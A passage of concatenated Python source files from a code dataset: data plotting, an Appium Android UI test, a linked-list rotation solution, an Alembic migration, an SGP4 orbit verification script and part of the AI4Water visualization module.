\ntest = pd.read_csv(\"/Users/yuchenli/Box Sync/Yuchen_project/\"\n                   
\"Truven_rising_stars/SJR_education_clustering/\"\n \"SJR_education.csv\", sep = \",\", encoding = 'utf-8')\nset_1 = set(test.HBE_ID)\nset_2 = set(education.HBE_ID)\nset_2.difference(set_1)\n\n# Plot test in 2-D\nimport matplotlib.pyplot as plt\n\n# Take outlier\ntest = test[test['HBE_ID'] != 'HBE_ONC_1000335']\n\nfig = plt.figure()\nax1 = fig.add_subplot(111)\n\nax1.scatter(test[test['KOL']=='No']['SJR'], \\\n test[test['KOL']=='No']['Education_score'], \n s=10, c='b', marker='s', label='Non')\n\nax1.scatter(test[test['KOL']=='Yes']['SJR'], \\\n test[test['KOL']=='Yes']['Education_score'], \n s=10, c='r', marker='o', label='KOL')\nplt.xlabel('SJR')\nplt.ylabel('Education_score')\nplt.legend(loc='upper right')\nplt.show()\n","sub_path":"SJR_education_clustering/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"335211976","text":"# -*- coding; UTF-8 -*-\nimport os, time\nimport unittest\nfrom appium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nimport uiautomator\nfrom Practice.Common.Swipe_Action import swipeUp\n\nclass ScrollTo(unittest.TestCase):\n def setUp(self):\n desired_caps = {}\n desired_caps['platformName'] = 'Android'\n desired_caps['platformVersion'] = '4.4.4'\n desired_caps['deviceName'] = '192.168.1.101:5555'\n desired_caps['appPackage'] = 'com.example.android.apis'\n desired_caps['appActivity'] = 'com.example.android.apis.ApiDemos'\n self.driver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)\n self.driver.implicitly_wait(15)\n def tearDown(self):\n self.driver.quit()\n\n def test_ScrollTo(self):\n #Scroll till element is visible\n while 1:\n try:\n views = self.driver.find_element_by_android_uiautomator('new UiSelector().text(\"Views\")')\n views.is_displayed()\n time.sleep(1)\n views.click() #click on Views\n break\n except NoSuchElementException:\n swipeUp(self, 2000)\n time.sleep(2)\n #Scroll till element which contains Spinner text\n spinner = self.driver.find_element_by_android_uiautomator('new UiScrollable(new UiSelector().scrollable(true).instance(0)).scrollIntoView(new UiSelector().text(\"Spinner\").instance(0));')\n time.sleep(1)\n print(\"Spinner text has been found and now clicking on It.\")\n spinner.click() #click on Spinner\n #Click on Planet drop down to open drop down list\n ele = self.driver.find_element_by_id(\"com.example.android.apis:id/spinner2\")\n ele.find_element_by_id(\"android:id/text1\")\n ele.click()\n #self.driver.find_element_by_id(\"com.example.android.apis:id/spinner2\").click()\n pluto = self.driver.find_element_by_android_uiautomator('new UiScrollable(new UiSelector().scrollable(true).instance(0)).scrollIntoView(new UiSelector().text(\"Pluto\").instance(0));')\n time.sleep(1)\n print(\"Pluto text has been found and now clicking on It.\")\n pluto.click()\n\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(ScrollTo)\n unittest.TextTestRunner(verbosity=2).run(suite)","sub_path":"Practice/ScrollDownInSpinnerList.py","file_name":"ScrollDownInSpinnerList.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"246642220","text":"from __future__ import division\nimport numpy as np\n\ndef savetimeseries(t, y, fileprefix):\n \n '''\n save timeseries data to file\n '''\n\n filename = fileprefix + '.txt'\n N = len(t)\n ts = np.zeros([N,2])\n 
ts[:,0] = t\n    ts[:,1] = y\n    np.savetxt(filename, ts)\n\n    return\n","sub_path":"code/savetimeseries.py","file_name":"savetimeseries.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"587554127","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 25 14:14:11 2019\r\n\r\n@author: binxi\r\n\"\"\"\r\n\r\n# Definition for singly-linked list.\r\n# class ListNode(object):\r\n#     def __init__(self, x):\r\n#         self.val = x\r\n#         self.next = None\r\n\r\nclass Solution(object):\r\n    def rotateRight(self, head, k):\r\n        \"\"\"\r\n        :type head: ListNode\r\n        :type k: int\r\n        :rtype: ListNode\r\n        \"\"\"\r\n        if head is None:\r\n            return None\r\n        \r\n        lst = [head]\r\n        \r\n        while head.next is not None:\r\n            head = head.next\r\n            lst.append(head)\r\n        \r\n        # close the list into a ring, then cut it k nodes before the tail\r\n        lst[-1].next = lst[0]\r\n\r\n        length = len(lst)\r\n        \r\n        k = k % length\r\n        \r\n        node = lst[length - 1 - k].next\r\n        \r\n        lst[length - 1 - k].next = None\r\n        \r\n        return node","sub_path":"Leetcode/#61 Rotate List.py","file_name":"#61 Rotate List.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"50152041","text":"\"\"\"Added notes table\n\nRevision ID: 36e3cf26d28\nRevises: \nCreate Date: 2015-07-01 15:41:56.353393\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '36e3cf26d28'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n    ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('notes',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('source', sa.Text(), nullable=True),\n    sa.Column('source_type', sa.Integer(), nullable=True),\n    sa.Column('text', sa.Text(), nullable=True),\n    sa.Column('created_at', sa.DateTime(), nullable=True),\n    sa.PrimaryKeyConstraint('id')\n    )\n    ### end Alembic commands ###\n\n\ndef downgrade():\n    ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('notes')\n ### end Alembic commands ###\n","sub_path":"alembic/versions/36e3cf26d28_added_notes_table.py","file_name":"36e3cf26d28_added_notes_table.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"436324188","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nVerify against SGP4\n\"\"\"\n\nimport pdb\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sim_config import *\nfrom simulation_step import simulation_step\nfrom propagate_step import sgp4_step\n\n\n#----------------Initialize / Setup Workspace------------------\ntspan = np.array([0, 864]) # [sec]\nT = np.arange(0, tspan[1]+tstep, tstep)\n\n\n#---------------------Initial State Vector---------------------\nr_i, v_i = sgp4_step(line1, line2, tstart)\n# pdb.set_trace()\nstate_i = np.r_[r_i, q_i, v_i, w_i]\nstate_history = np.zeros((np.shape(T)[0], np.shape(state_i)[0]))\nstate_history_sgp4 = np.zeros((np.shape(T)[0], 6))\nstate_history[0, :] = state_i\nstate_history_sgp4[0, :] = np.r_[r_i, v_i]\nsim_state = {'state': state_i, 't': tstart}\n\n\n\n#---------------------Propagate---------------------------\nfor i, elapsed_t in enumerate(T[0:-1]):\n\n\t# Simulator\n\tsensors, sim_state = simulation_step(np.zeros(3), sim_state)\n\tstate_history[i+1, :] = sim_state['state']\n\n\t# SGP4\n\tstate_history_sgp4[i+1, :] = np.array(sgp4_step(line1, line2, sim_state['t'])).reshape((6,))\n\n\tprint(i)\n\t# print(state_history[i+1, 3:7])\n\n\n#------------------------Plot-----------------------------\nplt.figure()\nplt.plot(T/3600, np.linalg.norm(state_history[:, 0:3] - state_history_sgp4[:, 0:3], axis=1), label=\"position [km]\")\nplt.plot(T/3600, 1e3*np.linalg.norm(state_history[:, 7:10] - state_history_sgp4[:, 3:6], axis=1), label=\"velocity [m/s]\")\nplt.xlabel('time [hr]')\nplt.ylabel('error')\nplt.legend()\nplt.grid()\nplt.suptitle('Error against SGP4')\n\nplt.figure()\nplt.plot(T/3600, np.linalg.norm(state_history[:,0:3], axis=1) - 6378.0, label=\"sim\")\nplt.plot(T/3600, np.linalg.norm(state_history_sgp4[:,0:3], axis=1) - 6378.0, label=\"sgp4\")\nplt.xlabel('time [hr]')\nplt.ylabel('altitude [km]')\nplt.legend()\nplt.grid()\n\nplt.figure()\nplt.plot(state_history[:,0], state_history[:,1])\nplt.xlabel('X_ECI')\nplt.ylabel('Y_ECI')\nplt.grid()\n\nplt.figure()\nplt.plot(T/3600, state_history[:,3:7])\nplt.xlabel('time [hr]')\nplt.ylabel('quaternions')\nplt.grid()\n\nplt.figure()\nplt.plot(T/3600, state_history[:,10:13])\nplt.xlabel('time [hr]')\nplt.ylabel('angular velocity [rad/s]')\nplt.grid()\n\nplt.show()","sub_path":"Simulator/verify_sgp4.py","file_name":"verify_sgp4.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"294366487","text":"import os\nimport json\nimport warnings\nfrom typing import Any, Callable, List, Tuple, Union\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport tensorflow as tf\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nfrom AI4Water.backend import xgboost\n\nfrom AI4Water.utils.SeqMetrics import RegressionMetrics\nfrom AI4Water.utils.utils import _missing_vals\nfrom AI4Water.utils.utils import find_tot_plots, init_subplots, Jsonize\nfrom AI4Water.utils.transformations import Transformations\n\n# TODO add Murphy's plot as shown in MLAir\n# https://robjhyndman.com/hyndsight/murphy-diagrams/\n# competitive skill score plot/ bootstrap 
skill score plot as in MLAir\n# rank histogram and reliability diagram for probabilitic forecasting model.\n# show availability plot of data\n\nclass Plot(object):\n\n def __init__(self, path = None):\n self.path = path\n\n @property\n def path(self):\n return self._path\n\n @path.setter\n def path(self, x):\n if x is None:\n x = os.getcwd()\n self._path = x\n\n def save_or_show(self, save: bool = True, fname=None, where='', dpi=300, bbox_inches='tight', close=True):\n\n if save:\n assert isinstance(fname, str)\n if \"/\" in fname:\n fname = fname.replace(\"/\", \"__\")\n if \":\" in fname:\n fname = fname.replace(\":\", \"__\")\n\n save_dir = os.path.join(self.path, where)\n\n if not os.path.exists(save_dir):\n assert os.path.dirname(where) in ['', 'activations', 'weights', 'plots', 'data', 'results'], f\"unknown directory: {where}\"\n save_dir = os.path.join(self.path, where)\n\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n fname = os.path.join(save_dir, fname + \".png\")\n\n plt.savefig(fname, dpi=dpi, bbox_inches=bbox_inches)\n else:\n plt.show()\n\n if close:\n plt.close('all')\n return\n\nclass Interpret(Plot):\n\n def __init__(self, model):\n \"\"\"Interprets the AI4Water Model.\"\"\"\n\n self.model = model\n\n super().__init__(model.path)\n\n if self.model.category.upper() == \"DL\":\n\n if any(['attn_weight' in l for l in model.layer_names]):\n self.plot_act_along_inputs(f'attn_weight_{model.lookback - 1}_1', name='attention_weights')\n\n if hasattr(model, 'TemporalFusionTransformer_attentions'):\n atten_components = self.tft_attention_components()\n\n @property\n def model(self):\n return self._model\n\n @model.setter\n def model(self, x):\n self._model = x\n\n def plot(self):\n \"\"\"\n For NBeats, plot seasonality and trend https://pytorch-forecasting.readthedocs.io/en/latest/tutorials/ar.html#Interpret-model\n For TFT, attention, variable importance of static, encoder and decoder, partial dependency\n # https://pytorch-forecasting.readthedocs.io/en/latest/tutorials/stallion.html#Variable-importances\n\n \"\"\"\n\n def feature_importance(self):\n if self.model.category.upper() == \"ML\":\n\n model_name = list(self.model.config['model'].keys())[0]\n if model_name.upper() in [\"SVC\", \"SVR\"]:\n if self.model._model.kernel == \"linear\":\n # https://stackoverflow.com/questions/41592661/determining-the-most-contributing-features-for-svm-classifier-in-sklearn\n return self.model._model.coef_\n elif hasattr(self.model._model, \"feature_importances_\"):\n return self.model._model.feature_importances_\n\n def f_importances_svm(self, coef, names, save):\n\n plt.close('all')\n mpl.rcParams.update(mpl.rcParamsDefault)\n classes = coef.shape[0]\n features = coef.shape[1]\n fig, axis = plt.subplots(classes, sharex='all')\n axis = axis if hasattr(axis, \"__len__\") else [axis]\n\n for idx, ax in enumerate(axis):\n colors = ['red' if c < 0 else 'blue' for c in self._model.coef_[idx]]\n ax.bar(range(features), self._model.coef_[idx], 0.4)\n\n plt.xticks(ticks=range(features), labels=self.model.in_cols, rotation=90, fontsize=12)\n self.save_or_show(save=save, fname=f\"{list(self.model.config['model'].keys())[0]}_feature_importance\")\n return\n\n def plot_feature_importance(self, importance=None, save=True, use_xgb=False, **kwargs):\n\n if importance is None:\n importance = self.feature_importance()\n\n if self.model.category == \"ML\":\n model_name = list(self.model.config['model'].keys())[0]\n if model_name.upper() in [\"SVC\", \"SVR\"]:\n if self._model.kernel == 
\"linear\":\n return self.f_importances_svm(importance, self.model.in_cols, save=save)\n else:\n warnings.warn(f\"for {self._model.kernel} kernels of {model_name}, feature importance can not be plotted.\")\n return\n\n if isinstance(importance, np.ndarray):\n assert importance.ndim <= 2\n\n with open(os.path.join(self.model.path, 'feature_importance.json'), 'w') as fp:\n json.dump(Jsonize(importance)(), fp)\n\n use_prev = self.model.config['use_predicted_output']\n all_cols = self.model.config['inputs'] if use_prev else self.model.config['inputs'] + \\\n self.model.config['outputs']\n plt.close('all')\n plt.figure()\n plt.title(\"Feature importance\")\n if use_xgb:\n if xgboost is None:\n warnings.warn(\"install xgboost to plot plot_importance using xgboost\", UserWarning)\n else:\n xgboost.plot_importance(self._model, **kwargs)\n else:\n plt.bar(range(self.model.ins if use_prev else self.model.ins + self.model.outs), importance, **kwargs)\n plt.xticks(ticks=range(len(all_cols)), labels=list(all_cols), rotation=90, fontsize=12)\n self.save_or_show(save, fname=\"feature_importance.png\")\n return\n\n def plot_act_along_inputs(self, layer_name: str, name: str = None, vmin=0, vmax=0.8, **kwargs):\n\n ins = self.model.ins\n outs= self.model.outs\n in_cols = self.model.in_cols\n out_cols = self.model.out_cols\n\n assert isinstance(layer_name, str), \"layer_name must be a string, not of {} type\".format(layer_name.__class__.__name__)\n\n predictions, observations = self.model.predict(pp=False, **kwargs)\n\n activation, data = self.model.activations(layer_names=layer_name, return_input=True, **kwargs)\n\n activation = activation[layer_name]\n data = self.model.inputs_for_attention(data)\n\n assert data.shape[1] == ins\n\n plt.close('all')\n\n for out in range(outs):\n pred = predictions[:, out]\n obs = observations[:, out]\n out_name = out_cols[out]\n\n for idx in range(ins):\n\n fig, (ax1, ax2, ax3) = plt.subplots(3, sharex='all')\n fig.set_figheight(10)\n\n ax1.plot(data[:, idx], label=in_cols[idx])\n ax1.legend()\n ax1.set_title('activations w.r.t ' + in_cols[idx])\n ax1.set_ylabel(in_cols[idx])\n\n ax2.plot(pred, label='Prediction')\n ax2.plot(obs, '.', label='Observed')\n ax2.legend()\n\n im = ax3.imshow(activation[:, :, idx].transpose(), aspect='auto', vmin=vmin, vmax=vmax)\n ax3.set_ylabel('lookback steps')\n ax3.set_xlabel('Examples')\n fig.colorbar(im, orientation='horizontal', pad=0.2)\n plt.subplots_adjust(wspace=0.005, hspace=0.005)\n if name is not None:\n _name = out_name + '_' + name\n plt.savefig(os.path.join(self.model.act_path, _name) + in_cols[idx], dpi=400, bbox_inches='tight')\n else:\n plt.show()\n plt.close('all')\n return\n\n def tft_attention_components(self, model=None, **train_data_args)->dict:\n \"\"\"\n Gets attention components of tft layer from AI4Water's Model.\n Arguments:\n model : a AI4Water's Model instance.\n train_data_args : keyword arguments which will passed to train_data method to fetch processed input data\n\n returns:\n dictionary containing attention components of tft as numpy arrays. 
Following four attention\n components are present in the dictionary\n decoder_self_attn: (attention_heads, ?, total_time_steps, 22)\n static_variable_selection_weights:\n encoder_variable_selection_weights: (?, encoder_steps, input_features)\n decoder_variable_selection_weights: (?, decoder_steps, input_features)\n \"\"\"\n if model is None:\n model = self.model\n\n x, _, _ = model.train_data(**train_data_args)\n attention_components = {}\n\n for k, v in model.TemporalFusionTransformer_attentions.items():\n if v is not None:\n temp_model = tf.keras.Model(inputs=model._model.inputs,\n outputs=v)\n attention_components[k] = temp_model.predict(x=x, verbose=1, steps=1)\n return attention_components\n\n def interpret_tft(self, outputs:dict, tft_params:dict, reduction: Union[None, str]=None):\n \"\"\"\n inspired from `interpret_output` of PyTorchForecasting\n :param outputs: outputs from tft model. It is expected to have following keys and their values as np.ndarrays\n prediction: (num_examples, forecast_len, outs/quantiles)\n attention: (num_examples, forecast_len, num_heads, total_sequence_length)\n static_variable_selection_weights: (num_examples, 1, num_static_inputs)\n encoder_variable_selection_weights: (batch_size, encoder_length, 1, num_enocder_inputs)\n decoder_variable_selection_weights: (batch_size, decoder_steps, 1, num_decoder_inputs)\n groups: (num_examples, num_groups)\n decoder_time_index: (num_examples, forecast_len)\n :param tft_params: parameters which were used to build tft layer\n :param reduction:\n\n Returns:\n intetrpretation: dict, dictionary of keys with values as np.ndarrays\n attention: (encoder_length,)\n static_variables: (7,)\n encoder_variables: (13,)\n decoder_variables: (6,)\n encoder_length_histogram: (encoder_length+1)\n decoder_length_histogram: (decoder_length,)\n \"\"\"\n num_examples = outputs['predictions'].shape[0]\n encoder_lengths = np.full(num_examples, tft_params['num_encoder_steps'])\n decoder_lengths = np.full(num_examples, tft_params['total_time_steps'] - tft_params['num_encoder_steps'])\n\n # histogram of decode and encode lengths\n encoder_length_histogram = integer_histogram(encoder_lengths, _min=0, _max=tft_params['num_encoder_steps'])\n decoder_length_histogram = integer_histogram(\n decoder_lengths, _min=1, _max=decoder_lengths.shape[1]\n )\n\n # mask where decoder and encoder where not applied when averaging variable selection weights\n encoder_variables = outputs[\"encoder_variables\"].squeeze(-2)\n encode_mask = create_mask(encoder_variables.shape[1], encoder_lengths)\n encoder_variables = encoder_variables.masked_fill(encode_mask.unsqueeze(-1), 0.0).sum(dim=1)\n encoder_variables /= (\n outputs[\"encoder_lengths\"]\n .where(encoder_lengths > 0, np.ones_like(encoder_lengths))\n .unsqueeze(-1)\n )\n\n decoder_variables = decoder_lengths.squeeze(-2)\n decode_mask = create_mask(decoder_variables.size(1), decoder_lengths)\n decoder_variables = decoder_variables.masked_fill(decode_mask.unsqueeze(-1), 0.0).sum(dim=1)\n decoder_variables /= decoder_lengths.unsqueeze(-1)\n\n if reduction is not None: # if to average over batches\n assert reduction in ['mean', 'sum']\n encoder_variables = encoder_variables.sum(dim=0)\n decoder_variables = decoder_variables.sum(dim=0)\n\n\n interpretation = dict(\n #attention=attention,\n #static_variables=static_variables,\n encoder_variables=encoder_variables,\n decoder_variables=decoder_variables,\n encoder_length_histogram=encoder_length_histogram,\n decoder_length_histogram=decoder_length_histogram,\n )\n 
return interpretation\n\n\ndef integer_histogram(\n    data: np.ndarray, _min: Union[None, int] = None, _max: Union[None, int] = None\n) -> np.ndarray:\n    \"\"\"\n    Create histogram of integers in predefined range\n    Args:\n        data: data for which to create histogram\n        _min: minimum of histogram, is inferred from data by default\n        _max: maximum of histogram, is inferred from data by default\n    Returns:\n        histogram\n    \"\"\"\n    uniques, counts = np.unique(data, return_counts=True)\n    if _min is None:\n        _min = uniques.min()\n    if _max is None:\n        _max = uniques.max()\n    #hist = np.zeros(_max - _min + 1, dtype=np.long).scatter(\n    #    dim=0, index=uniques - _min, src=counts\n    #)\n    hist = scatter_numpy(self=np.zeros(_max - _min + 1, dtype=np.int64),\n                         dim=0, index=uniques-_min, src=counts)\n    return hist\n\n\ndef create_mask(size: int, lengths: np.ndarray, inverse: bool = False) -> np.ndarray:\n    \"\"\"\n    Create boolean masks of shape len(lengths) x size.\n    An entry at (i, j) is True if lengths[i] > j.\n    Args:\n        size (int): size of second dimension\n        lengths (np.ndarray): array of lengths\n        inverse (bool, optional): If true, boolean mask is inverted. Defaults to False.\n    Returns:\n        np.ndarray: boolean mask\n    \"\"\"\n    if inverse:  # return where values are\n        return np.arange(size)[None, :] < lengths[:, None]\n    else:  # return where no values are\n        return np.arange(size)[None, :] >= lengths[:, None]\n\n\ndef scatter_numpy(self, dim, index, src):\n    \"\"\"\n    Writes all values from the array src into self at the indices specified in the index array.\n    :param self:\n    :param dim: The axis along which to index\n    :param index: The indices of elements to scatter\n    :param src: The source element(s) to scatter\n    :return: self\n    \"\"\"\n    if index.dtype != np.dtype('int_'):\n        raise TypeError(\"The values of index must be integers\")\n    if self.ndim != index.ndim:\n        raise ValueError(\"Index should have the same number of dimensions as output\")\n    if dim >= self.ndim or dim < -self.ndim:\n        raise IndexError(\"dim is out of range\")\n    if dim < 0:\n        # Not sure why scatter should accept dim < 0, but that is the behavior in PyTorch's scatter\n        dim = self.ndim + dim\n    idx_xsection_shape = index.shape[:dim] + index.shape[dim + 1:]\n    self_xsection_shape = self.shape[:dim] + self.shape[dim + 1:]\n    if idx_xsection_shape != self_xsection_shape:\n        raise ValueError(\"Except for dimension \" + str(dim) +\n                         \", all dimensions of index and output should be the same size\")\n    if (index >= self.shape[dim]).any() or (index < 0).any():\n        raise IndexError(\"The values of index must be between 0 and (self.shape[dim] -1)\")\n\n    def make_slice(arr, _dim, i):\n        slc = [slice(None)] * arr.ndim\n        slc[_dim] = i\n        return slc\n\n    # We use index and dim parameters to create idx\n    # idx is in a form that can be used as a NumPy advanced index for scattering of src param. 
in self\n idx = [[*np.indices(idx_xsection_shape).reshape(index.ndim - 1, -1),\n index[make_slice(index, dim, i)].reshape(1, -1)[0]] for i in range(index.shape[dim])]\n idx = list(np.concatenate(idx, axis=1))\n idx.insert(dim, idx.pop())\n\n if not np.isscalar(src):\n if index.shape[dim] > src.shape[dim]:\n raise IndexError(\"Dimension \" + str(dim) + \"of index can not be bigger than that of src \")\n src_xsection_shape = src.shape[:dim] + src.shape[dim + 1:]\n if idx_xsection_shape != src_xsection_shape:\n raise ValueError(\"Except for dimension \" +\n str(dim) + \", all dimensions of index and src should be the same size\")\n # src_idx is a NumPy advanced index for indexing of elements in the src\n src_idx = list(idx)\n src_idx.pop(dim)\n src_idx.insert(dim, np.repeat(np.arange(index.shape[dim]), np.prod(idx_xsection_shape)))\n self[idx] = src[src_idx]\n\n else:\n self[idx] = src\n\n return self\n\n\nclass Visualizations(Plot):\n\n def __init__(self, data=None, config: dict=None, path=None, dpi=300, in_cols=None, out_cols=None):\n self.config = config\n self.data=data\n self.dpi = dpi\n self.in_cols = in_cols\n self.out_cols = out_cols\n\n super().__init__(path)\n\n @property\n def config(self):\n return self._config\n\n @config.setter\n def config(self, x):\n self._config = x\n\n @property\n def data(self):\n return self._data\n\n @data.setter\n def data(self, x):\n self._data = x\n\n def horizon_plots(self, errors:dict, fname='', save=True):\n plt.close('')\n fig, axis = plt.subplots(len(errors), sharex='all')\n\n legends = {'r2': \"$R^2$\", 'rmse': \"RMSE\", 'nse': \"NSE\"}\n idx = 0\n for metric_name, val in errors.items():\n ax = axis[idx]\n ax.plot(val, '--o', label=legends.get(metric_name, metric_name))\n ax.legend(fontsize=14)\n if idx>=len(errors)-1: ax.set_xlabel(\"Horizons\", fontsize=14)\n ax.set_ylabel(legends.get(metric_name, metric_name), fontsize=14)\n idx += 1\n self.save_or_show(save=save, fname=fname)\n return\n\n def plot_results(self, true, predicted:pd.DataFrame, save=True, name=None, where=None):\n \"\"\"\n # kwargs can be any/all of followings\n # fillstyle:\n # marker:\n # linestyle:\n # markersize:\n # color:\n \"\"\"\n\n regplot(true, predicted, save=save, name=name, where=where)\n self.save_or_show(save=save, fname=f\"{name}_reg\", close=False, where=where)\n\n mpl.rcParams.update(mpl.rcParamsDefault)\n\n fig, axis = init_subplots(width=12, height=8)\n\n # it is quite possible that when data is datetime indexed, then it is not equalidistant and large amount of graph\n # will have not data in that case lines plot will create a lot of useless interpolating lines where no data is present.\n style = '.' if isinstance(true.index, pd.DatetimeIndex) else '-'\n\n if np.isnan(true.values).sum() > 0:\n style = '.' # For Nan values we should be using this style otherwise nothing is plotted.\n\n ms = 4 if style == '.' 
else 2\n\n axis.plot(predicted, style, color='r', linestyle='-', marker='', label='Prediction')\n\n axis.plot(true, style, color='b', marker='o', fillstyle='none', markersize=ms, label='True')\n\n axis.legend(loc=\"best\", fontsize=22, markerscale=4)\n plt.xticks(fontsize=18)\n plt.yticks(fontsize=18)\n plt.xlabel(\"Time\", fontsize=18)\n\n self.save_or_show(save=save, fname=name, close=False, where=where)\n return\n\n def plot_loss(self, history: dict, name=\"loss_curve\"):\n \"\"\"Considering history is a dictionary of different arrays, possible training and validation loss arrays,\n this method plots those arrays.\"\"\"\n\n plt.clf()\n plt.close('all')\n fig = plt.figure()\n plt.style.use('ggplot')\n i = 1\n\n legends = {\n 'mean_absolute_error': 'Mean Absolute Error',\n 'mape': 'Mean Absolute Percentage Error',\n 'mean_squared_logarithmic_error': 'Mean Squared Logrithmic Error',\n 'pbias': \"Percent Bias\",\n \"nse\": \"Nash-Sutcliff Efficiency\",\n \"kge\": \"Kling-Gupta Efficiency\",\n \"tf_r2\": \"$R^{2}$\"\n }\n\n sub_plots = {1: {'axis': (1,1), 'width': 9, 'height': 6},\n 2: {'axis': (1, 1), 'width': 9, 'height': 6},\n 3: {'axis': (1, 2), 'wdith': 9, 'height': 6},\n 4: {'axis': (1, 2), 'width': 9, 'height': 6},\n 5: {'axis': (3, 1), 'width': 8, 'height': 12},\n 6: {'axis': (3, 1), 'width': 8, 'height': 12},\n 7: {'axis': (3, 2), 'width': 20, 'height': 20},\n 8: {'axis': (4, 2), 'width': 20, 'height': 20},\n 9: {'axis': (5, 2), 'width': 20, 'height': 20},\n 10: {'axis': (5, 2), 'width': 20, 'height': 20},\n 12: {'axis': (4, 3), 'width': 20, 'height': 20},\n }\n\n epochs = range(1, len(history['loss']) + 1)\n axis_cache = {}\n\n for key, val in history.items():\n\n m_name = key.split('_')[1:] if 'val' in key and '_' in key else key\n\n if isinstance(m_name, list):\n m_name = '_'.join(m_name)\n if m_name in list(axis_cache.keys()):\n axis = axis_cache[m_name]\n axis.plot(epochs, val, color=[0.96707953, 0.46268314, 0.45772886], label= 'Validation ')\n axis.legend()\n else:\n axis = fig.add_subplot(*sub_plots[len(history)]['axis'], i)\n axis.plot(epochs, val, color=[0.13778617, 0.06228198, 0.33547859], label= 'Training ')\n axis.legend()\n axis.set_xlabel(\"Epochs\")\n axis.set_ylabel(legends.get(key, key))\n axis_cache[key] = axis\n i += 1\n axis.set(frame_on=True)\n\n fig.set_figheight(sub_plots[len(history)]['height'])\n fig.set_figwidth(sub_plots[len(history)]['width'])\n self.save_or_show(fname=name, save=True if name is not None else False)\n return\n\n def plot_index(self, save=True, **kwargs):\n \"\"\"plots the datetime index of dataframe\"\"\"\n if isinstance(self.data, pd.DataFrame):\n self._plot_index(self.data, save=save, **kwargs)\n\n elif isinstance(self.data, list):\n for data in self.data:\n if isinstance(data, pd.DataFrame):\n self._plot_index(data, save=save, **kwargs)\n\n elif isinstance(self.data, dict):\n for data_name, data in self.data.values():\n if isinstance(data, pd.DataFrame):\n self._plot_index(data, save=save, **kwargs)\n return\n\n def _plot_index(self,\n index,\n save=True,\n fname=\"index\",\n figsize=(10,5),\n dpi=200,\n label_fs=18,\n title_fs=20,\n leg_fs=14,\n leg_ms=4,\n color='r',\n ):\n \"\"\"\n Plots the index of a datafram.\n index: can be pandas dataframe or index itself. 
if dataframe, its index will be used for plotting\n \"\"\"\n plt.close('all')\n if isinstance(index, pd.DataFrame):\n index=index.index\n\n idx = pd.DataFrame(np.ones(len(index)), index=index, columns=['Observations'])\n axis = idx.plot(linestyle='', marker='.', color=color, figsize=figsize)\n axis.legend(fontsize=leg_fs, markerscale=leg_ms)\n axis.set_xlabel(axis.get_xlabel(), fontdict={'fontsize': label_fs})\n axis.set_title(\"Temporal distribution of Observations\", fontsize=title_fs)\n axis.get_yaxis().set_visible(False)\n self.save_or_show(save=save, fname=fname, where='data', dpi=dpi)\n return\n\n def heatmap(self, cols=None, **kwargs):\n \"\"\"\n Plots a heatmap.\n :param cols:\n :param kwargs:\n :return:\n Examples:\n >>>vis = Visualizations(data)\n >>>vis.heatmap(save=False)\n \"\"\"\n if isinstance(self.data, pd.DataFrame):\n self.heatmap_df(self.data, cols=cols, **kwargs)\n\n elif isinstance(self.data, list):\n for idx, data in enumerate(self.data):\n if isinstance(data, pd.DataFrame):\n self.heatmap_df(data, cols=cols[idx] if isinstance(cols, list) else None,\n fname=f\"data_heatmap_{idx}\", **kwargs)\n\n elif isinstance(self.data, dict):\n for data_name, data in self.data.items():\n if isinstance(data, pd.DataFrame):\n _cols = cols[data_name] if cols is not None else None\n self.heatmap_df(data, _cols, fname=data_name, **kwargs)\n return\n\n def heatmap_df(\n self,\n data:pd.DataFrame,\n cols=None,\n spine_color: str = \"#EEEEEE\",\n save=True,\n title=None,\n title_fs=16,\n fname=\"\",\n **kwargs\n ):\n \"\"\"\n plots a heat map of a dataframe. Helpful to show where missing values are located in a dataframe.\n :param data: pd.DataFrame,\n :param cols: list, columns from data to be used.\n :param spine_color:\n :param save: bool\n :param title: str, title of the plot\n :param title_fs: int, font size of title\n :param fname: str, name of saved file, only valid if save is True.\n :param kwargs: following kwargs are allowed:\n xtick_labels_fs, 12\n ytick_labels_fs, 20\n figsize: tuple\n any additional keyword argument will be passed to sns.heatmap\n\n :return:\n \"\"\"\n if cols is None:\n cols = data.columns\n _kwargs = {\n \"xtick_labels_fs\": 12,\n \"ytick_labels_fs\": 20,\n \"figsize\": (5 + len(cols)*0.25, 10 + len(cols)*0.1),\n }\n for k in _kwargs.keys():\n if k in kwargs:\n _kwargs[k] = kwargs.pop(k)\n\n show_time_on_yaxis = False\n if isinstance(data.index, pd.DatetimeIndex):\n show_time_on_yaxis = True\n\n fig, axis = plt.subplots(figsize=_kwargs['figsize'])\n # ax2 - Heatmap\n sns.heatmap(data[cols].isna(), cbar=False, cmap=\"binary\", ax=axis, **kwargs)\n\n axis.set_yticks(axis.get_yticks()[0::5].astype('int'))\n\n if 